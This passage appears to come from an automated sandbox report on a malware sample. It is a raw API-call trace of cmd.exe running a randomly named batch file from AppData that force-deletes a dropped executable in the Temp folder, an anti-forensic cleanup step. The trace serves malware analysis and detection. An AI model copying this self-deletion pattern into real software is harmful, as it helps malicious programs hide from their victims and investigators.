lpProcessInformation=0x16ee18*(hProcess=0x54, hThread=0x58, dwProcessId=0xc28, dwThreadId=0xc2c)) returned 1 [0100.049] CloseHandle (hObject=0x58) returned 1 [0100.049] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.049] GetEnvironmentStringsW () returned 0x1b0970* [0100.049] FreeEnvironmentStringsW (penv=0x1b0970) returned 1 [0100.049] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0103.640] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16ed0c | out: lpExitCode=0x16ed0c*=0x0) returned 1 [0103.640] CloseHandle (hObject=0x54) returned 1 [0103.640] _vsnwprintf (in: _Buffer=0x16ee54, _BufferCount=0x13, _Format="%08X", _ArgList=0x16ed18 | out: _Buffer="00000000") returned 8 [0103.640] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0103.640] GetEnvironmentStringsW () returned 0x1b2c28* [0103.641] FreeEnvironmentStringsW (penv=0x1b2c28) returned 1 [0103.641] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0103.641] GetEnvironmentStringsW () returned 0x1b2c28* [0103.641] FreeEnvironmentStringsW (penv=0x1b2c28) returned 1 [0103.641] DeleteProcThreadAttributeList (in: lpAttributeList=0x16ed70 | out: lpAttributeList=0x16ed70) [0103.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.641] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.641] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.641] SetConsoleInputExeNameW () returned 0x1 [0103.641] GetConsoleOutputCP () returned 0x1b5 [0103.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.642] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0103.642] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.642] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.642] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0103.643] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.643] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0103.643] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x7c, lpOverlapped=0x0) returned 1 [0103.644] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.644] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n") returned 62 [0103.644] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.644] GetFileType (hFile=0x54) returned 0x1 [0103.644] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.644] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.645] _tell (_FileHandle=3) returned 83 [0103.646] _close (_FileHandle=3) returned 0 [0103.646] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 
[0103.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.646] GetFileType (hFile=0x7) returned 0x2 [0103.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0103.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.646] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0103.646] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0103.646] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.646] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0103.646] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] GetFileType (hFile=0x7) returned 0x2 [0103.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.647] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] GetFileType (hFile=0x7) returned 0x2 [0103.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.647] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0103.647] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.647] WriteConsoleW 
(in: hConsoleOutput=0x7, lpBuffer=0x1bf008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1bf008*, lpNumberOfCharsWritten=0x16f5b8*=0x3) returned 1 [0103.648] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" ") returned 58 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] GetFileType (hFile=0x7) returned 0x2 [0103.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x3a) returned 1 [0103.648] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0103.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.648] GetFileType (hFile=0x7) returned 0x2 [0103.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0103.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.649] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0103.649] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0103.649] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0103.649] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0103.649] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.649] GetCurrentDirectoryW (in: 
nBufferLength=0x106, lpBuffer=0x16ef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.649] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16df9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.649] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x16e1d0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0103.650] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.650] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x2020 [0103.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b2148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.650] SetErrorMode (uMode=0x0) returned 0x0 [0103.650] SetErrorMode (uMode=0x1) returned 0x0 [0103.650] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", nBufferLength=0x104, lpBuffer=0x16e5f0, lpFilePart=0x16e5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpFilePart=0x16e5d8*="NhsgKr2p.exe") returned 0x30 [0103.650] SetErrorMode (uMode=0x0) returned 0x1 [0103.650] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.650] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.650] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x2020 [0103.651] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x0, lpFindFileData=0x1c0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c0554) returned 0x1a0aa8 [0103.651] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 1 [0103.651] FindNextFileW (in: hFindFile=0x1a0aa8, lpFindFileData=0x1c0554 | out: lpFindFileData=0x1c0554) returned 0 [0103.652] GetLastError () returned 0x12 [0103.652] FindClose (in: hFindFile=0x1a0aa8 | out: hFindFile=0x1a0aa8) returned 1 [0103.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.653] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.653] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.653] SetConsoleInputExeNameW () returned 0x1 [0103.653] GetConsoleOutputCP () returned 0x1b5 [0103.653] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.653] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.653] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0103.653] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.653] _get_osfhandle (_FileHandle=3) returned 
0x54 [0103.653] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0103.654] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x3e, lpOverlapped=0x0) returned 1 [0103.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n") returned 62 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] GetFileType (hFile=0x54) returned 0x1 [0103.654] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.654] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.655] _tell (_FileHandle=3) returned 145 [0103.656] _close (_FileHandle=3) returned 0 [0103.656] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 [0103.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.656] GetFileType (hFile=0x7) returned 0x2 [0103.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0103.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0103.656] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.656] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0103.657] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] GetFileType (hFile=0x7) returned 0x2 [0103.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.657] GetFileType (hFile=0x7) returned 0x2 [0103.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0103.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1bf008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1bf008*, lpNumberOfCharsWritten=0x16f5b8*=0x3) returned 1 [0103.658] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" ") returned 58 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] GetFileType (hFile=0x7) returned 0x2 [0103.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] 
WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x3a) returned 1 [0103.658] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0103.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.658] GetFileType (hFile=0x7) returned 0x2 [0103.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0103.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0103.659] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0103.659] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0103.659] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0103.659] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.659] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16ef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.659] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16df9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.659] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x16e1d0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e1cc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0103.660] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0103.660] 
_wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b2148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0103.660] SetErrorMode (uMode=0x0) returned 0x0 [0103.660] SetErrorMode (uMode=0x1) returned 0x0 [0103.660] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", nBufferLength=0x104, lpBuffer=0x16e5f0, lpFilePart=0x16e5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpFilePart=0x16e5d8*="NhsgKr2p.exe") returned 0x30 [0103.660] SetErrorMode (uMode=0x0) returned 0x1 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2=".") returned 64 [0103.660] _wcsicmp (_String1="NhsgKr2p.exe", _String2="..") returned 64 [0103.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x0, lpFindFileData=0x1c0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c0554) returned 0xffffffff [0103.661] GetLastError () returned 0x2 [0103.661] _get_osfhandle (_FileHandle=2) returned 0xb [0103.661] GetFileType (hFile=0xb) returned 0x2 [0103.661] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.661] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ebcc | 
out: lpMode=0x16ebcc) returned 1 [0103.661] _get_osfhandle (_FileHandle=2) returned 0xb [0103.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16ec00 | out: lpConsoleScreenBufferInfo=0x16ec00) returned 1 [0103.661] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0103.662] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x16ec40 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\r\n") returned 0x41 [0103.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x16ec24, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16ec24*=0x41) returned 1 [0103.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.663] SetConsoleInputExeNameW () returned 0x1 [0103.663] GetConsoleOutputCP () returned 0x1b5 [0103.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.663] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 
[0103.663] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0103.663] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.663] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x0, lpOverlapped=0x0) returned 1 [0103.664] GetLastError () returned 0x0 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] GetFileType (hFile=0x54) returned 0x1 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f554, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f554*=0x0, lpOverlapped=0x0) returned 1 [0103.664] GetLastError () returned 0x0 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] GetFileType (hFile=0x54) returned 0x1 [0103.664] _get_osfhandle (_FileHandle=3) returned 0x54 [0103.664] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0103.664] longjmp () [0103.665] _tell (_FileHandle=3) returned 145 [0103.665] _close (_FileHandle=3) returned 0 [0103.665] CmdBatNotification 
() returned 0x0 [0103.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.665] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0103.665] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.665] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0103.665] SetConsoleInputExeNameW () returned 0x1 [0103.665] GetConsoleOutputCP () returned 0x1b5 [0103.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0103.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.666] exit (_Code=0) Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = 